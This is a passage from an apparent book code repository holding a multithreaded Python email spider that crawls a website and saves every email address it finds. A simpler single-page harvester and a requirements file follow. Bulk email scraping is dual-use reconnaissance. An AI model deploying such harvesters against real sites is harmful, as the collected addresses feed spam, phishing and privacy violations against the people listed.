# if the URL is visited by the crawler already, 210 | # then get the response HTML directly, no need to request again 211 | text = self.crawler.visited_urls[url] 212 | emails = set() 213 | try: 214 | # we use finditer() to find multiple email addresses if available 215 | for re_match in re.finditer(EMAIL_REGEX, text): 216 | email = re_match.group() 217 | # if it's a valid email address, add it to our set 218 | if is_valid_email_address(email): 219 | emails.add(email) 220 | except Exception as e: 221 | with print_lock: 222 | print(e) 223 | return set() 224 | # return the emails set 225 | return emails 226 | 227 | def scan_urls(self): 228 | while True: 229 | # get the URL from the URLs queue 230 | url = self.crawler.urls_queue.get() 231 | # extract the emails from the response HTML 232 | emails = self.get_emails_from_url(url) 233 | for email in emails: 234 | with print_lock: 235 | print("[+] Got email:", email, "from url:", url) 236 | if email not in self.extracted_emails: 237 | # if the email extracted is not in the extracted emails set 238 | # add it to the set and print to the output file as well 239 | with file_lock: 240 | with open(self.output_file, "a") as f: 241 | print(email, file=f) 242 | self.extracted_emails.add(email) 243 | # task done for that queue item 244 | self.crawler.urls_queue.task_done() 245 | 246 | 247 | def run(self): 248 | for t in range(self.n_threads): 249 | # spawn self.n_threads to run self.scan_urls 250 | t = threading.Thread(target=self.scan_urls) 251 | # daemon thread 252 | t.daemon = True 253 | t.start() 254 | 255 | # wait for the queue to empty 256 | self.crawler.urls_queue.join() 257 | print(f"[+] A total of {len(self.extracted_emails)} emails were extracted & saved.") 258 | 259 | 260 | def track_stats(crawler: Crawler): 261 | # print some stats about the crawler & active threads every 5 seconds, 262 | # feel free to adjust this on your own needs 263 | while is_running: 264 | with print_lock: 265 | print(f"{RED}[+] Queue size: {crawler.urls_queue.qsize()}{RESET}") 266 | print(f"{GRAY}[+] Total Extracted External links: {len(crawler.external_urls)}{RESET}") 267 | print(f"{GREEN}[+] Total Extracted Internal links: {len(crawler.internal_urls)}{RESET}") 268 | print(f"[*] Total threads running: {threading.active_count()}") 269 | time.sleep(5) 270 | 271 | 272 | def start_stats_tracker(crawler: Crawler): 273 | # wrapping function to spawn the above function in a separate daemon thread 274 | t = threading.Thread(target=track_stats, args=(crawler,)) 275 | t.daemon = True 276 | t.start() 277 | 278 | 279 | if __name__ == "__main__": 280 | parser = argparse.ArgumentParser(description="Advanced Email Spider") 281 | parser.add_argument("url", help="URL to start crawling from & extracting email addresses") 282 | parser.add_argument("-m", "--max-crawl-urls", 283 | help="The maximum number of URLs to crawl, default is 30.", 284 | type=int, default=30) 285 | parser.add_argument("-t", "--num-threads", 286 | help="The number of threads that runs extracting emails" \ 287 | "from individual pages. Default is 10", 288 | type=int, default=10) 289 | parser.add_argument("--crawl-external-urls", 290 | help="Whether to crawl external URLs that the domain specified", 291 | action="store_true") 292 | parser.add_argument("--crawl-delay", 293 | help="The crawl delay in seconds, useful for not overloading web servers", 294 | type=float, default=0.01) 295 | # parse the command-line arguments 296 | args = parser.parse_args() 297 | url = args.url 298 | # set the global variable indicating whether the program is still running 299 | # helpful for the tracker to stop running whenever the main thread stops 300 | is_running = True 301 | # initialize the crawler and start crawling right away 302 | crawler = Crawler(url, max_crawl_urls=args.max_crawl_urls, delay=args.crawl_delay, 303 | crawl_external_urls=args.crawl_external_urls) 304 | crawler.start() 305 | # give the crawler some time to fill the queue 306 | time.sleep(5) 307 | # start the statistics tracker, print some stats every 5 seconds 308 | start_stats_tracker(crawler) 309 | # start the email spider that reads from the crawler's URLs queue 310 | email_spider = EmailSpider(crawler, n_threads=args.num_threads) 311 | email_spider.run() 312 | # set the global variable so the tracker stops running 313 | is_running = False 314 | -------------------------------------------------------------------------------- /chapter-6/email-spider/email_harvester.py: -------------------------------------------------------------------------------- 1 | import re 2 | from requests_html import HTMLSession 3 | 4 | url = "https://www.randomlists.com/email-addresses" 5 | EMAIL_REGEX = r"""(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])""" 6 | 7 | # initiate an HTTP session 8 | session = HTMLSession() 9 | # get the HTTP Response 10 | r = session.get(url) 11 | # for JAVA-Script driven websites 12 | r.html.render() 13 | 14 | for re_match in re.finditer(EMAIL_REGEX, r.html.raw_html.decode()): 15 | print(re_match.group()) -------------------------------------------------------------------------------- /chapter-6/email-spider/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | requests_html 3 | bs4 4 | colorama --------------------------------------------------------------------------------